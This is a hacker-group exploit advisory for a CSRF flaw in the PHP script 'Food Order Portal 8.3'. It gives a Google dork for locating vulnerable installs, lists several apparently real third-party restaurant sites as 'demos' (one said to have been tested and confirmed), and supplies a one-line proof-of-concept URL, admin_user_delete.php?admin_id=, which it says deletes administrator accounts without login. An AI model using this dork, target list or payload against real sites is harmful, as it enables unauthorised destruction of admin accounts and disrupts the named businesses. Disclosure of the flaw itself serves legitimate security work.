Food Order Portal 8.3 - (CSRF) Remote Admin Delete PoC
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact(onlymail) : knockout@e-mail.com.tr
[~] HomePage : http://Cyber-Warrior.Org - http://h4x0resec.blogspot.com
[~] Greetz: DaiMon,furty,BackDoor,EthicalHacker,BARCOD3,SZE©,VolqaN,Septemb0x   | Unuttuklarýmýz affola..
############################################################
                 Turkey Security Group
                 'h4x0re SECURITY'                        
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Food Order Portal
|~Affected Version : 8.3
|~Official Web and referance's : http://www.tourismscripts.com/scripts/scripts/food-order-portal-multi-restaurant-lingual-php-script.html
|~RISK : Medium
|~Google Keyword/Dork : inurl:login_restaurant.php        | are example
|~Tested On : Kali Linux \ Tested Browser: Mozilla Firefox \ Arora
####################INFO################################
without logging in to the admin panel it is possible to delete administrator..
########################################################
########################################################
Demos ;
http://click4foods.co.uk       <=== Tested and panel was checked. CSRF was confirmed
                                                     ( From the official site of reference are shown )

http://www.saveonmeals.com
http://pizzatakeway.it/
http://myfood24.it/
http://www.foodrunner.ru/
..
..
==============================================================================00
                        CSRF PoC: 
http://[VICTIM]/admin/admin_user_delete.php?admin_id=[ADMIN ID] (Default: 1,2)
                       Administrator Deleted.
==============================================================================00

               .__        _____        _______                 
                |  |__    /  |  |___  __\   _  \_______   ____  
                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \ 
                |   Y  \/    ^   />    <\  \_/   \  | \/\  ___/ 
                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
                     \/      |__|      \/      \/            \/ 
                         _____________________________  
                        /   _____/\_   _____/\_   ___ \ 
                        \_____  \  |    __)_ /    \  \/ 
                        /        \ |        \\     \____
                       /_______  //_______  / \______  /
                               \/         \/         \/